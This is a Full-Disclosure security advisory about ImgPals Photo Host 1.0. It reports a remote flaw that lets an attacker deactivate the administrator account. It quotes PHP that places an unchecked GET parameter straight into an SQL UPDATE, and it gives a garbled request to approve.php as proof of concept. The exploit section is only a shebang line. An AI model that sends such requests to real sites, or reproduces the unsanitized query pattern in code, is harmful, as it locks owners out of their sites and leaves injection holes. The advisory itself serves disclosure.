-=[--------------------ADVISORY-------------------]=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] -=[-----------------------------------------------]=- -=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. I released the ImgPals Photo Host Version 1.0 STABLE Features Include: * Easy Install * Full README file included * Full Control Panel to control your site * User Side Features o Multiple JQuery Uploads o Create and Edit Photo Albums o Make Albums Public or Private o Describe Albums and Photos o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos o Add Friends o Chat with Friends o Update people with status wall posting o Manage Profile o Profile Avatar Uploads o Private Messaging * And much more, be sure to check out the Demo ...::[ Bug ]::.. A attaker can remotely disable the account from administratore not allowing the same to be able to access the site ...::[ Proof Of Concept ]::.. if ($_GET['a'] == 'app0'){ $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'"); by sending the command approve.php? u = a = 1 & app0 a attaker can disable the Administrator account. ...::[ Exploit ]::.. #!/usr/bin/php -f _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/